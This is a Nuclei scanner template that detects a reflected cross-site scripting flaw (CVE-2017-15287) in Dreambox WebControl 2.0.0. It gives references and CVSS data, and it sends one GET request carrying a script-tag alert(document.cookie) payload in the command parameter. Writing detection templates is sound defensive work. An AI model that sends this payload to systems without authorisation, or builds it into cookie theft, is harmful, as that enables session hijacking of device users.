nuclei-templates/http/cves/2017/CVE-2017-15287.yaml

43 lines
1.8 KiB
YAML
Raw Normal View History

id: CVE-2017-15287
info:
name: Dreambox WebControl 2.0.0 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
reference:
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
- https://nvd.nist.gov/vuln/detail/CVE-2017-15287
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-15287
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00129
epss-percentile: 0.47426
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: bouqueteditor_project
product: bouqueteditor
2023-09-06 13:22:34 +00:00
framework: dreambox
2024-01-14 09:21:50 +00:00
tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project
http:
- raw:
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
- 'Unknown command: <script>alert(document.cookie)</script>'
# digest: 490a0046304402206c61653a0972775ca878500b18fe9bd62710351751921be04a68c0df7ad7c961022064ecf4fefb2e1eb354f6691c8e7708f01ec373d872f8d4403b281fdf96a29475:922c64590222798bb761d5b6d8e72950